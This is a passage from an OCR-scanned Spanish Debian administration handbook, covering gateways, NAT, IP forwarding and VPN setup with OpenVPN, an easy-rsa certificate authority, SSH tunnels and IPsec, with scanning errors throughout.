Linux  es  compatible  con  ACPI  (interfaz  avanzada  de  configuracion  y  energia:  «Advanced  Confi¬ 
guration  and  Power  Interface))}  —  el  estandar  mas  reciente  sobre  gestion  de  energia.  El  paquete 
acpid  provee  un  demonio  que  busca  eventos  relacionados  con  la  gestion  de  energia  (cambios 
entre  corriente  alterna  y  bateria  en  un  portatil,  etc.)  y  puede  ejecutar  varios  programas  en  res- 
puesta. 


CUIDADO 

Tarjetas  graficas  y 
suspension 


El  controlador  de  la  tarjeta  de  video  frecuentemente  es  el  problema  cuando  la  sus¬ 
pension  no  funciona  correctamente.  En  estos  casos,  es  buena  idea  probar  la  ultima 
version  del  servidor  grafico  X.org. 


Luego  de  esta  revision  de  los  servicios  basicos  comunes  a  muchos  sistemas  Unix,  nos  enfocare- 
mos  en  el  entorno  de  las  maquinas  administradas:  la  red.  Se  necesitan  muchos  servicios  para 
que  la  red  funcione  correctamente.  Hablaremos  de  ellos  en  el  proximo  capitulo. 
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Capi'tulo 

Infraestructura  de 

red 

Contenidos 

Puerta  de  enlace  236  Red  virtual  privada  238  Calidad  del  servicio  249  Enrutamiento  dinamico  251 

IPv6  252  Servidores  de  nombres  de  dominio  (DNS)  254  DHCP  258  Herramientas  de  diagnostico  de  red  260 


Linux  goza  de  toda  la  herencia  de  Unix  sobre  redes,  y  Debian  provee  un  conjunto  completo  de 
herramientas  para  creary  administrarlas.  Este  capitulo  examina  estas  herramientas. 


10.1  Puerta  de  enlace 


Una  puerta  de  enlace  es  un  sistema  que  enlaza  varias  redes.  Este  termino  usualmente  se  refiere 
al  «punto  de  salida»  de  una  red  local  en  el  camino  obligatorio  hacia  las  direcciones  IP  externas. 
La  puerta  de  enlace  esta  conectada  a  cada  una  de  las  redes  que  enlaza  y  actua  como  router  para 
transmitir  paquetes  IP  entre  sus  varias  interfaces. 


VOLVER  A  LOS  CIMIENTOS  La  mayorfa  de  las  redes  hoy  en  di'a  utilizan  el  protocolo  IP  (protocolo  de  Internet: 

Paquete  IP  « Internet  Protocol).  Este  protocolo  segmenta  los  datos  transmitidos  en  paquetes 
de  tamano  limitado.  Cada  paquete  contiene,  ademas  de  sus  datos  como  carga  util, 
algunos  detalles  necesarios  para  enrutarlos  apropiadamente. 


VOLVER  A  LOS  CIMIENTOS  Muchos  programas  no  gestionan  los  paquetes  individuales  por  si  mismos  aunque 
TCP/UDP  l°s  datos  que  transmiten  viajan  por  IP;  generalmente  utilizan  TCP  (protocolo  de 
control  de  transmision:  «Transmission  Control  Protocol»).  TCP  es  una  capa  sobre 
IP  que  permite  establecer  conexiones  dedicadas  a  flujos  de  datos  entre  dos  puntos. 
Los  programas  solo  ven,  entonces,  un  punto  de  entrada  en  el  que  pueden  verter 
datos  con  la  garantia  que  los  mismos  datos  existiran  sin  perdida  (y  en  el  mismo 
orden)  en  el  punto  de  salida  en  el  otro  extremo  de  la  conexion.  Si  bien  pueden  ocurrir 
muchos  tipos  de  errores  en  las  capas  inferiores,  TCP  los  compensa:  retransmite 
paquetes  perdidos  y  reordena  apropiadamente  los  paquetes  que  lleguen  fuera  de 
orden  (por  ejemplo  si  utilizaron  caminos  diferentes). 

Otro  protocolo  sobre  IP  es  UDP  (protocolo  de  datagramas  de  usuario:  «User  Da¬ 
tagram  Protocol).  A  diferencia  de  TCP,  esta  orientado  a  paquetes.  Sus  objetivos 
son  diferentes:  el  proposito  de  UDP  solo  es  transmitir  un  paquete  de  una  aplica- 
cion  a  otra.  El  protocolo  no  intenta  compensar  la  posible  perdida  de  paquetes  en 
el  camino,  asf  como  tampoco  asegura  que  los  paquetes  sean  recibidos  en  el  mismo 
orden  en  el  que  se  los  envio.  La  principal  ventaja  de  este  protocolo  es  que  mejora 
enormemente  la  latencia  ya  que  la  perdida  de  un  paquete  no  demora  la  recepcion 
de  todos  los  paquetes  siguientes  hasta  que  se  retransmita  aquel  perdido. 

Tanto  TCP  como  UDP  involucran  puertos,  que  son  «numeros  de  extension*  pa¬ 
ra  establecer  comunicaciones  con  una  aplicacion  particular  en  una  maquina.  Este 
concepto  permite  mantener  varias  comunicaciones  diferentes  en  paralelo  con  el 
mismo  correspondiente  debido  a  que  se  pueden  diferenciar  estas  comunicaciones 
por  el  numero  de  puerto. 

Algunos  de  estos  numeros  de  puerto  —  estandarizados  por  IANA  (autoridad  de 
numeros  asignados  en  Internet:  « Internet  Assigned  Numbers  Authority»)  —  son 
«muy  conocidos*  por  estar  asociados  con  servicios  de  red.  Por  ejemplo,  general¬ 
mente  el  servidor  de  correo  utiliza  el  puerto  TCP  25. 

•-  http : //www. iana . org/assignmen t s/port  -  numbers 


Cuando  una  red  local  utiliza  un  rango  de  direcciones  privadas  (no  enrutables  en  Internet),  la 
puerta  de  enlace  necesita  implementar  enmascarado  de  direccion  («address  masquerading»)  para 
que  los  equipos  en  la  red  puedan  comunicarse  con  el  mundo  exterior.  La  operacion  de  enmas¬ 
carado  es  un  tipo  de  proxy  que  funciona  a  nivel  de  red:  se  reemplaza  cada  conexion  saliente 
de  una  maquina  interna  con  una  conexion  desde  la  puerta  de  enlace  misma  (ya  que  la  puerta 
de  enlace  tiene  una  direccion  externa  y  enrutable),  los  datos  que  pasan  a  traves  de  la  conexion 
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enmascarada  son  enviados  a  la  nueva  conexion  y  los  datos  recibidos  en  respuesta  son  enviados 
a  traves  de  la  conexion  enmascarada  a  la  maquina  interna.  La  puerta  de  enlace  utiliza  un  rango 
de  puertos  TCP  dedicados  para  este  proposito,  generalmente  con  numeros  muy  altos  (mayores 
a  60000).  Cada  conexion  que  proviene  de  una  maquina  interna  parece,  para  el  mundo  exterior, 
una  conexion  que  proviene  de  uno  de  esos  puertos  reservados. 


CULTURA  El  RFC  1918  define  tres  rangos  de  direcciones  IPv4  que  no  deben  ser  viables  en  Inter- 
Rango  de  direcciones  net  s'no  s°'°  utilizadas  en  redes  locales.  El  primero,  10.0.0. 0/8  (revise  el  recuadro 
privadas  «Conceptos  de  red  esenciales  (Ethernet,  direccion  IP,  subred,  difusion)*  pagina  158) 
es  un  rango  clase  A  (con  224  direcciones  IP).  El  segundo,  172 .16.0. 0/12,  reune  16 
rangos  clase  B  (172 . 16 . 0 . 0/16  a  172 .31.0. 0/16),  cada  uno  de  los  cuales  contie- 
ne  216  direcciones  IP.  Finalmente,  192 . 168 . 0 . 0/16  es  un  rango  clase  B  (agrupando 
256  rangos  clase  C,  192 . 168 . 0 . 0/24  a  192 . 168 . 255 . 0/24,  con  256  direcciones  IP 
cada  uno). 

http : //www. faqs.org/rfcs/rfcl918. html 


La  puerta  de  enlace  tambien  puede  realizar  dos  tipos  de  traduction  de  direcciones  de  red  («Network 
Address  Translation))  o  NAT).  El  primer  tipo,  NAT  de  destino  (DNAT)  es  una  tecnica  para  alterar  la 
direccion  IP  de  destino  (y/o  el  puerto  TCP  o  UDP)  para  una  conexion  (generalmente)  entrante. 
El  mecanismo  de  seguimiento  de  conexiones  tambien  altera  los  paquetes  siguientes  en  la  misma 
conexion  para  asegurar  continuidad  en  la  comunicacion.  El  segundo  tipo  de  NAT  es  NAT  de  origen 
(SNAT),  del  que  el  enmascarado  es  un  caso  particular;  SNAT  modifica  la  direccion  IP  de  origen 
(y/o  el  puerto  TCP  o  UDP)  de  una  conexion  (generalmente)  saliente.  En  lo  que  respecta  a  DNAT, 
todos  los  paquetes  en  la  conexion  son  gestionados  de  forma  apropiada  por  el  mecanismo  de 
seguimiento  de  conexiones.  Sepa  que  NAT  solo  es  relevante  para  IPv4  y  su  espacio  de  direcciones 
limitado;  en  IPv6,  la  amplia  disponibilidad  de  direcciones  reduce  enormemente  la  utilidad  de 
NAT  permitiendo  que  todas  las  direcciones  «internas»  sean  enrutables  directamente  en  Internet 
(esto  no  implica  que  se  pueda  acceder  a  las  maquinas  internas  ya  que  los  firewalls  intermedios 
puede  filtrar  el  trafico). 


VOLVER  A  LOS  CIMIENTOS  Una  aplicacion  concreta  de  DNAT  es  redirection  de  puertos  («port  forwarding*). 

Redireccion  de  puertos  *-as  conexi°nes  entrantes  a  un  puerto  dado  de  una  maquina  son  redireccionados 

a  un  puerto  en  otra  maquina.  Sin  embargo,  pueden  existir  otras  soluciones  para 
conseguir  un  efecto  similar,  especialmente  a  nivel  de  aplicacion  con  ssh  (revise  la 
Seccion  9. 2. 1.3,  «Creacion  de  tuneles  cifrados  con  redireccion  de  puertos*  pagina 
206)  o  redir. 


Suficiente  teoria,  pongamonos  practicos.  Convertir  un  sistema  Debian  en  una  puerta  de  enlace 
solo  es  cuestion  de  activar  la  opcion  apropiada  en  el  nucleo  Linux  a  traves  del  sistema  de  archivos 
virtual  /proc/: 

#  echo  1  >  /proc/sys/net/ipv4/conf/default/forwarding 

Tambien  se  puede  activar  esta  opcion  automaticamente  durante  el  inicio  si  /etc/sysctl .  conf 
define  la  opcion  net. ipv4.conf.default. forwarding  como  1. 
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Ejemplo  10.1  El  archivo  /etc/ sysctl .  conf 


net . ipv4 . conf . default . forwarding  =  1 
net . ipv4 . conf . default . rp  filter  =  1 
net . ipv4 . tcpsyncookies  =  1 


Puede  conseguir  el  mismo  efecto  para  IPv6  simplemente  reemplazando  ipv4  con  ipv6  en  la  orden 
manual y  utilizando  la  linea  net.ipv6.conf.all.forwarding  en  /etc/sysctl .  conf. 

Activar  enmascarado  de  IPv4  es  una  operacion  un  poco  mas  compleja  que  involucra  configurar 
el  firewall  netfilter. 

De  forma  similar,  utilizar  NAT  (para  IPv4)  necesita  configurar  netfilter.  Debido  a  que  el  proposito 
principal  de  este  componente  es  filtrar  paquetes,  se  enumeran  los  detalles  en  el  Capitulo  14: 
“Seguridad”  (revise  la  Seccion  14.2,  «Firewall  o  el  filtrado  de  paquetes»  pagina  400). 


10.2.  Red  virtual  privada 

Una  red  virtual  privada  (VPN:  «Virtual  Private  Network»)  es  una  forma  de  enlazar  dos  redes  loca¬ 
les  diferentes  a  traves  de  Internet  utilizando  un  tunel;  el  tunel  generalmente  esta  cifrado  para 
confidencialidad.  Usualmente  se  utilizan  VPNs  para  integrar  una  maquina  remota  a  la  red  local 
de  una  empresa. 

Muchas  herramientas  lo  proveen.  Open  VPN  es  una  solucion  eficiente,  facil  de  desplegar  y  man- 
tener,  basada  en  SSL/TLS.  Otra  posibilidad  es  utilizar  IPsec  para  cifrar  el  trafico  IP  entre  dos 
maquinas;  este  cifrado  es  transparente,  lo  que  significa  que  no  necesita  modificar  las  aplica- 
ciones  ejecutando  en  estos  equipos  para  tener  en  cuenta  la  VPN.  Tambien  puede  utilizar  SSH, 
ademas  de  para  sus  funcionalidades  mas  convencionales,  para  proveer  una  VPN.  Finalmente, 
puede  establecer  una  VPN  utilizando  el  protocolo  PPTP  de  Microsoft.  Existen  otras  soluciones, 
pero  estan  mas  alia  del  alcance  de  este  libro. 


10.2.1.  OpenVPN 

OpenVPN  es  un  pedazo  de  software  dedicado  a  crear  redes  privadas  virtuales.  Su  configuracion 
involucra  crear  interfaces  de  red  virtuales  en  el  servidor  VPN  y  en  los  clientes;  es  compatible 
con  interfaces  tun  (para  tuneles  a  nivel  de  IP)  y  tap  (para  tuneles  a  nivel  Ethernet).  En  la  practica, 
usualmente  utilizara  interfaces  tun  excepto  cuando  los  clientes  VPN  deban  intengrarse  a  la  red 
local  del  servidor  a  traves  de  un  puente  Ethernet. 

OpenVPN  se  basa  en  OpenSSL  para  toda  la  criptografia  SSL/TLS  y  funcionalidades  asociadas 
(confidencialidad,  autenticacion,  integridad,  falta  de  repudio).  Puede  configurarlo  con  una  Have 
privada  compartida  o  con  un  certificado  X.509  basado  en  la  infraestructura  de  Have  publica. 
Se  prefiere  fuertemente  esta  ultima  configuracion  ya  que  permite  mas  flexibilidad  cuando  se 
enfrenta  a  un  numero  creciente  de  usuarios  itinerantes  que  acceden  a  la  VPN. 
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CULTURA  Netscape  invento  el  protocolo  SSL  ( capa  de  zocalos  seguros:  «Secure  Socket  La- 
y  y[_s  yer»)  para  asegurar  conexiones  con  servidores  web.  Luego  fue  estandarizado  por  el 
IETF  bajo  el  acronimo  TLS  ( seguridad  de  capa  de  transporte:  «Transport  Layer  Se¬ 
curity^.  Desde  entonces,  TLS  ha  seguido  evolucionando  y  en  nuestros  di'as  SSL  ha 
quedado  obsoleto  debido  a  multiples  fallos  de  diseiio  que  se  han  ido  descubriendo. 


Infraestructura  de  Have  publica:  easy-rsa 

El  algoritmo  RSA  es  ampliamente  utilizado  en  criptograffa  de  Have  publica.  Involucra  un  «par  de 
llaves»,  compuestas  de  una  Have  privada  y  una  Have  publica.  Las  dos  Haves  estan  fuertemente 
relacionadas  entre  ellas  y  sus  propiedades  matematicas  son  tales  que  un  mensaje  cifrado  con  la 
Have  publica  solo  puede  ser  descifrado  por  alguien  que  conozca  la  Have  privada,  lo  que  asegura 
confidencialidad.  En  la  direccion  opuesta,  un  mensaje  cifrado  con  la  clave  privada  puede  ser 
descifrado  por  cualquiera  que  conozca  la  Have  publica,  lo  que  permite  autenticar  el  origen  del 
mensaje  ya  que  solo  pudo  haber  sido  generado  por  alguien  con  acceso  a  la  Have  privada.  Cuando 
se  asocie  una  funcion  de  hash  digital  (MD5,  SHA1  o  una  variante  mas  reciente),  esto  lleva  a  un 
mecanismo  de  firma  que  puede  aplicarse  a  cualquier  mensaje. 

Sin  embargo,  cualquiera  puede  crear  un  par  de  Haves,  almacenar  cualquier  identidad  en  ella  y 
pretender  ser  la  identidad  que  elijan.  Una  solucion  involucra  el  concepto  de  una  autoridad  de 
certification  (CA:  «Certification  Authority)))  formalizado  por  el  estandar  X.509.  Este  termino  se 
refiere  a  una  entidad  que  posee  un  par  de  Haves  confiable  conocido  como  certificado  raiz.  Solo 
se  utiliza  este  certificado  para  firmar  otros  certificados  (pares  de  Haves),  luego  que  se  siguieron 
suficientes  pasos  para  revisar  la  identidad  almacenada  en  el  par  de  Haves.  Las  aplicaciones  que 
utilizan  X.509  luego  pueden  verificar  los  certificados  que  se  les  presente  si  conocen  los  certifi¬ 
cados  raiz  confiables. 

OpenVPN  sigue  esta  regia.  Dado  que  los  CA  publicos  solo  expiden  certificados  a  cambio  de  un 
pago  (importante),  tambien  es  posible  crear  una  autoridad  de  certificacion  privada  dentro  de 
la  empresa.  El  paquete  easy-rsa  proporciona  herramientas  que  dan  soporte  a  la  infraestructura 
de  certificados  X.509,  implementados  como  un  conjunto  de  scripts  haciendo  usp  del  comando 
openssl. 


NOTA  En  versiones  Debian  hasta  la  Wheezy,  easy-rsa  se  distribufa  como  parte  del  paque- 
easy-rsa  antes  Jessie  te  °PenvPn>  y  sus  scripts  se  encontraban  en  /usr/share/doc/openvpn/examples/ 
easy-  rsa/2 . 0/.  Configurar  una  CA  implicaba  copiar  ese  directorio,  en  vez  de  usar 
el  comando  make-cadir  documentado  aqui. 


Los  administradores  de  Falcot  Corp  utilizan  esta  herramienta  para  crear  los  certificados  nece- 
sarios,  tanto  para  los  servidores  como  para  los  clientes.  Esto  permite  que  la  configuracion  de 
todos  los  clientes  sea  similar  ya  que  solo  deberan  configurarlos  para  confiar  en  certificados  que 
provengan  de  la  CA  local  de  Falcot.  Esta  CA  es  el  primer  certificado  a  crear;  para  ello  los  ad¬ 
ministradores  preparan  un  directorio  con  los  ficheros  necesarios  para  la  CA  en  una  ubicacion 
apropiada,  preferentemente  a  una  maquina  que  no  esta  conectada  a  la  red  para  evitar  el  riesgo 
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de  robo  de  la  Have  privada  de  la  CA. 

$  make-cadir  pki-falcot 
$  cd  pki-falcot 

Luego  almacenan  los  parametros  necesarios  en  el  archivo  vars,  especialmente  aquellos  cuyos 
nombres  comienzan  con  KEY_;  estas  variables  luego  son  integradas  en  el  entorno: 

$  vim  vars 
$  grep  KEY_  vars 

export  KEY  CONFIG='$EASY  RSA/whichopensslcnf  $EASY_RSA‘ 
expo  rt  KEY  DI R=" $EASY  RSA/ key s " 

echo  NOTE:  If  you  run  ./clean-all,  I  will  be  doing  a  rm  - rf  on  $KEY  DIR 

export  KEY  SIZE=2048 

export  KEY  EXPIRE=3650 

export  KEY  C0UNTRY=" FR" 

export  KEY  PROVINCE="Loire" 

expo  rt  KEY  CITY="Saint -  Etienne" 

export  KEY  0RG="Falcot  Corp" 

export  KEY_EMAIL="admin@falcot . com" 

export  KEY_OU="Certif icate  authority" 

export  KEY  _NAME="Certif icate  authority  for  Falcot  Corp" 

#  If  you'd  like  to  sign  all  keys  with  the  same  Common  Name,  uncomment  the  KEY  CN 

export  below 

#  export  KEY_CN="CommonName" 

$  .  ./vars 

NOTE:  If  you  run  ./clean-all,  I  will  be  doing  a  rm  - rf  on  /home/roland/pki-falcot/ 

**  keys 

$  ./clean-all 

El  siguiente  paso  es  crear  el  par  de  Haves  en  si  de  la  CA  (durante  este  paso  se  almacenaran  las 
dos  partes  del  par  de  Haves  en  keys/ca  .  crt  y  keys/ca  .  key): 

$  ./build-ca 

Generating  a  2048  bit  RSA  private  key 

. +++ 

.  .  . +++ 

writing  new  private  key  to  'ca.key' 


You  are  about  to  be  asked  to  enter  information  that  will  be  incorporated 
into  your  certificate  reguest. 

What  you  are  about  to  enter  is  what  is  called  a  Distinguished  Name  or  a  DN. 
There  are  quite  a  few  fields  but  you  can  leave  some  blank 
For  some  fields  there  will  be  a  default  value, 

If  you  enter  the  field  will  be  left  blank. 


Country  Name  (2  letter  code)  [FR]: 

State  or  Province  Name  (full  name)  [Loire]: 
Locality  Name  (eg,  city)  [Saint-Etienne] : 
Organization  Name  (eg,  company)  [Falcot  Corp]: 
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Organizational  Unit  Name  (eg,  section)  [Certificate  authority]: 

Common  Name  (eg,  your  name  or  your  server’s  hostname)  [Falcot  Corp  CA] : 

Name  [Certificate  authority  for  Falcot  Corp] : 

Email  Address  [admin@falcot.com]: 

Ahora  puede  crear  el  certificado  para  el  servidor  VPN,  as!  como  tambien  los  parametros  Diffie- 
Hellman  necesarios  en  el  servidor  para  la  conexion  SSL/TLS.  Se  identifica  el  servidor  VPN  por 
su  nombre  DNS  vpn.falcot.com;  se  reutiliza  este  nombre  para  los  archivos  de  Haves  generados 
(keys/vpn .  falcot .  com.  crt  para  el  certificado  publico,  keys/vpn .  falcot .  com.  key  para  la  Ha¬ 
ve  privada): 

$  ./build-key-server  vpn.falcot.com 

Generating  a  2048  bit  RSA  private  key 


. +++ 

writing  new  private  key  to  'vpn.falcot.com. key' 


You  are  about  to  be  asked  to  enter  information  that  will  be  incorporated 
into  your  certificate  reguest. 

What  you  are  about  to  enter  is  what  is  called  a  Distinguished  Name  or  a  DN. 
There  are  quite  a  few  fields  but  you  can  leave  some  blank 
For  some  fields  there  will  be  a  default  value, 

If  you  enter  '.',  the  field  will  be  left  blank. 


Country  Name  (2  letter  code)  [ FR]  : 

State  or  Province  Name  (full  name)  [Loire]: 

Locality  Name  (eg,  city)  [Saint-Etienne] : 

Organization  Name  (eg,  company)  [Falcot  Corp]: 

Organizational  Unit  Name  (eg,  section)  [Certificate  authority]: 

Common  Name  (eg,  your  name  or  your  server's  hostname)  [vpn.falcot.com]: 
Name  [Certificate  authority  for  Falcot  Corp]: 

Email  Address  [admin@falcot.com]: 


Please  enter  the  following  'extra'  attributes 
to  be  sent  with  your  certificate  request 
A  challenge  password  []: 

An  optional  company  name  []: 

Using  configuration  from  /home/roland/pki-falcot/openssl-l.O.O.cnf 
Check  that  the  request  matches  the  signature 
Signature  ok 

The  Subject's  Distinguished  Name  is  as  follows 


count  ryName 

stateOrProvinceName 

localityName 

organizationName 

organizationalUnitName 

commonName 

name 


PRINTABLE 

PRINTABLE 

T61STRING 

PRINTABLE 

PRINTABLE 

PRINTABLE 

PRINTABLE 


'FR' 

'  Loire ' 

' Saint -\0xFFFFFFC3\0xFFFFFF89tienne ' 
'Falcot  Corp' 

'Certificate  authority' 

' vpn . falcot . com ' 

'Certificate  authority  for  Falcot  Corp' 
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emailAdd  ress  : IA5STRING : ' admin@falcot . com' 

Certificate  is  to  be  certified  until  Mar  6  14:54:56  2025  GMT  (3650  days) 
Sign  the  certificate?  [y/n]:y 


1  out  of  1  certificate  requests  certified,  commit?  [y/n]y 
Write  out  database  with  1  new  entries 
Data  Base  Updated 

$  ./build-dh 

Generating  DH  parameters,  2048  bit  long  safe  prime,  generator  2 
This  is  going  to  take  a  long  time 

[...] 


El  siguiente  paso  crea  los  certificados  para  los  clientes  VPN;  necesita  un  certificado  para  cada 
equipo  o  persona  autorizada  para  utilizar  la  VPN: 


$  ./build -key  JoeSmith 

Generating  a  2048  bit  RSA  private  key 
. +++ 


writing  new  private  key  to  'JoeSmith . key ' 


+++ 


You  are  about  to  be  asked  to  enter  information  that  will  be  incorporated 
into  your  certificate  request. 

What  you  are  about  to  enter  is  what  is  called  a  Distinguished  Name  or  a  DN. 
There  are  quite  a  few  fields  but  you  can  leave  some  blank 
For  some  fields  there  will  be  a  default  value, 

If  you  enter  the  field  will  be  left  blank. 


Country  Name  (2  letter  code)  [ FR]  : 

State  or  Province  Name  (full  name)  [Loire]: 

Locality  Name  (eg,  city)  [Saint-Etienne]  : 

Organization  Name  (eg,  company)  [Falcot  Corp] : 

Organizational  Unit  Name  (eg,  section)  [Certificate  authority ]: Development  unit 
Common  Name  (eg,  your  name  or  your  server's  hostname)  [JoeSmith] : Joe  Smith 
[...] 


Ahora  que  se  crearon  todos  los  certificados,  necesita  copiarlos  donde  correspondan:  la  Have 
publica  del  certificado  raiz  (key/ca .  crt)  sera  almacenada  en  todas  las  maquinas  (tanto  el  ser- 
vidor  como  los  clientes)  como  /etc/ssl/certs/Falcot_CA.  crt.  Solo  instalara  el  certificado 
del  servidor  en  el  servidor  (key/vpn  .  falcot .  com.  crt  en  /etc/ssl/vpn  .  falcot .  com.  crt  y 
key/vpn  .  falcot .  com .  key  en  /etc/ssl/private/vpn .  falcot .  com.  key  con  permisos  restrin- 
gidos  para  que  solo  el  administrador  pueda  leerlo),  con  los  parametros  Diffie-Hellman  corres- 
pondientes  (key/dh2048.  pern)  instalados  en  /etc/openvpn/dh2048 .  pern.  Instale  los  certifica¬ 
dos  de  clientes  en  el  cliente  de  VPN  correspondiente  de  forma  similar. 
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Configuracion  del  servidor  Open  VPN 


El  script  de  inicializacion  de  OpenVPN  intenta,  de  forma  predeterminada,  iniciar  todas  las  re¬ 
des  privadas  virtuales  definidas  en  /etc/openvpn/*  .  conf.  Configurar  un  servidor  VPN  enton- 
ces  es  cuestion  de  almacenar  el  archivo  de  configuracion  correspondiente  en  este  directorio. 
Un  buen  punto  de  partida  es  /usr/share/doc/openvpn/examples/sample-config-files/ 
server. conf. gz  que  lleva  a  un  servidor  bastante  estandar.  Por  supuesto  necesitara  adaptar  al- 
gunos  parametros:  ca,  cert,  key  y  d h  describiran  las  ubicaciones  seleccionadas  para  cada  uno  (res- 
pectivamente:  /etc/ssl/certs/FalcotCA.crt,  /etc/ssl/vpn.  falcot.com.  crt,  /etc/ssl/ pri  vat  e/vpn.falcot. 
com. key  y  /etc/openvpn/dh2048.pem).  La  directiva  server  10.8.0.0  255.255.255.0  define  la  subred 
utilizada  por  la  VPN;  el  servidor  utilizara  la  primera  direccion  IP  en  el  rango  (10.8.0.1)  y  se  asig- 
naran  a  los  clientes  el  resto  de  las  direcciones. 

Con  esta  configuracion  OpenVPN  creara  una  interfaz  de  red  virtual  al  iniciar,  generalmente  con 
el  nombre  tunO.  Sin  embargo,  normalmente  se  configuran  los  firewalls  al  mismo  tiempo  que 
las  interfaces  de  red  reales,  lo  que  ocurre  antes  que  inicie  OpenVPN.  La  creacion  de  una  inter¬ 
faz  de  red  virtual  persistente,  y  configurar  OpenVPN  para  que  la  utilice,  es  una  buena  practica 
recomendada.  Esto  ademas  permite  elegir  el  nombre  de  esta  interfaz.  A  tal  efecto,  openvpn  - 
mktun  -dev  vpn  -dev-type  tun  crea  una  interfaz  de  red  virtual  llamada  vpn  de  tipo  tun;  pue- 
de  integrar  facilmente  esta  orden  en  el  script  de  configuracion  del  firewall  0  en  la  directiva  up 
del  archivo  /etc/network/interfaces.  Debe  actualizar  tambien  el  archivo  de  configuracion 
de  OpenVPN  de  forma  acorde,  con  las  directivas  dev  vpn  y  dev-type  tun. 

Sin  mas  cambios,  los  clientes  VPN  solo  pueden  acceder  el  servidor  VPN  en  si  a  traves  de  la  di¬ 
reccion  10.8.0.1.  Para  permitir  a  los  clientes  que  accedan  la  red  local  (192.168.0.0/24)  necesitara 
agregar  una  directiva  push  route  192.168.0.0  255.255.255.0  a  la  configuracion  de  OpenVPN  para 
que  los  clientes  VPN  automaticamente  obtengan  una  ruta  de  red  que  les  indique  que  esta  red 
esta  disponible  a  traves  de  la  VPN.  Lo  que  es  mas,  los  equipos  en  la  red  local  tambien  necesitaran 
ser  informados  que  la  ruta  a  la  VPN  es  a  traves  del  servidor  de  VPN  (esto  funciona  automatica¬ 
mente  cuando  instala  el  servidor  VPN  en  la  puerta  de  enlace).  Otra  alternativa  es  configurar  el 
servidor  VPN  para  realizar  enmascaramiento  de  IPs  de  forma  que  las  conexiones  que  proven- 
gan  de  los  clientes  VPN  parezcan  provenir  del  servidor  VPN  en  su  lugar  (revise  la  Seccion  10.1, 
«Puerta  de  enlace»  pagina  236). 


Configuracion  del  cliente  OpenVPN 

Para  configurar  un  cliente  OpenVPN  tambien  necesita  crear  un  archivo  de  configuracion  en 
/etc/openvpn/.  Puede  conseguir  una  configuracion  estandar  utilizando  /us r/sha re/doc/ 
openvpn/examples/sample- config- files/client .  conf  como  punto  de  partida.  La  directi¬ 
va  remote  vpn.falcot.com  1194  describe  la  direccion  y  puerto  del  servidor  OpenVPN;  tambien 
necesita  adaptar  ca,  cert  y  key  para  describir  la  ubicacion  de  los  archivos  de  Have. 

Si  no  se  debe  iniciar  la  VPN  automaticamente  durante  el  inicio,  configure  la  directiva 
AUTOSTART  como  none  en  el  archivo  /etc/def  ault/openvpn.  Siempre  es  posible  iniciar  0  de- 
tener  una  conexion  VPN  dada  con  los  comandosservice  openvpn Qnombre  start  y  service 


Capltulo  10  —  Infraestructura  de  red 


243 


openvpn@no/mbrestop  (donde  la  conexion  nombre  coincide  con  aquella  definida  en  /etc/ 
openvpn /nombre.  conf). 

El  paquete  network-manager-openvpn-gnome  contiene  una  extension  para  Network  Manager  (re¬ 
vise  la  Seccion  8.2.4,  «Configuracion  de  red  automatica  para  usuarios  itinerantes»  pagina  162) 
que  permite  administrar  redes  privadas  virtuales  OpenVPN.  Esto  permite  que  cada  usuario  con¬ 
figure  graficamente  sus  conexiones  OpenVPN  y  las  controle  desde  el  icono  del  gestor  de  red. 


10.2.2.  Red  privada  virtual  con  SSH 

En  realidad  existen  dos  formas  de  crear  una  red  privada  virtual  con  SSH.  La  historica  involucra 
establecer  una  capa  PPP  sobre  el  enlace  SSH.  Se  describe  este  metodo  en  el  siguiente  «howto»: 

http://www.tldp . org/HOWTO/ppp- ssh/ 

El  segundo  metodo  es  mas  reciente  y  fue  introducido  con  OpenSSH  4.3;  ahora  OpenSSH  puede 
crear  interfaces  de  red  virtuales  (tun*)  en  ambos  extremos  de  una  conexion  SSH  y  puede  con- 
figurar  estas  interfaces  virtuales  exactamente  como  si  fueran  interfaces  fisicas.  Primero  debe 
activar  el  sistema  de  tuneles  configurando  PermitTunnel  como  «yes»  en  el  archivo  de  configu¬ 
ration  del  servidor  SSH  (/etc/ssh/sshd_conf ig).  Cuando  se  establece  la  conexion  SSH  debe 
solicitar  explicitamente  la  creacion  del  tunel  con  la  opcion  -w  any:any  (puede  reemplaza  any 
con  el  numero  de  dispositivo  tun  deseado).  Esto  necesita  que  el  usuario  tenga  permisos  de  ad- 
ministrador  en  ambos  extremos  para  poder  crear  el  dispositivo  de  red  (en  otras  palabras,  debe 
establecer  la  conexion  como  root). 

Ambos  metodos  para  crear  redes  privadas  virtuales  sobre  SSH  son  bastante  directos.  Sin  embar¬ 
go,  la  VPN  que  proveen  no  es  la  mas  eficiente  disponible;  en  particular,  no  maneja  muy  bien 
altos  niveles  de  trafico. 

La  explication  es  que  cuando  se  encapsula  TCP/IP  en  una  conexion  TCP/IP  (para  SSH)  se  utiliza 
el  protocolo  TCP  dos  veces,  una  vez  para  la  conexion  SSH  y  una  vez  dentro  del  tunel.  Esto  ge¬ 
nera  problemas,  especialmente  debido  a  la  forma  en  la  que  TCP  se  adapta  a  condiciones  de  red 
modificando  los  tiempo  de  espera.  El  siguiente  sitio  describe  el  problema  en  mas  detalle: 

+■  http :// sites .in ka .de/ sites/big red/devel/tcp- tcp . html 

Por  lo  tanto  debe  limitar  el  uso  de  VPNs  sobre  SSH  a  tuneles  esporadicos  y  de  un  solo  uso  que 
no  tengan  requisitos  de  rendimiento. 


10.2.3.  IPsec 

IPsec,  a  pesar  de  ser  el  estandar  en  VPNs  IP,  es  bastante  mas  complejo  en  su  implementation.  El 
motor  de  IPsec  esta  incorporado  al  nucleo  Linux;  el  paquete  ipsec-tools  provee  las  partes  necesa- 
rias  en  espacio  de  usuario,  las  herramientas  de  control  y  configuration.  En  terminos  concretos, 
el  archivo  /etc/ipsec- tools .  conf  de  cada  equipo  contiene  los  parametros  de  los  tuneles  IPsec 
(en  terminos  de  IPsec:  asociaciones  de  seguridad,  «Security  Associations)))  enlos  que  el  equipo  esta 
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involucrado;  el  script  /etc/init .  d/ set  key  provee  una  forma  de  iniciar  y  detener  el  tunel  (cada 
tunel  es  un  enlace  seguro  a  otra  maquina  conectada  a  la  red  privada  virtual).  Puede  construir 
este  archivo  a  mano  desde  la  documentacion  que  provee  la  pagina  de  manual  setkey(8).  Sin 
embargo,  escribir  los  parametros  para  todos  los  equipos  en  un  conjunto  de  maquinas  no  trivial 
se  convierte  facilmente  en  una  tarea  arduaya  que  la  cantidad  de  tuneles  crece  rapidamente.  Ins- 
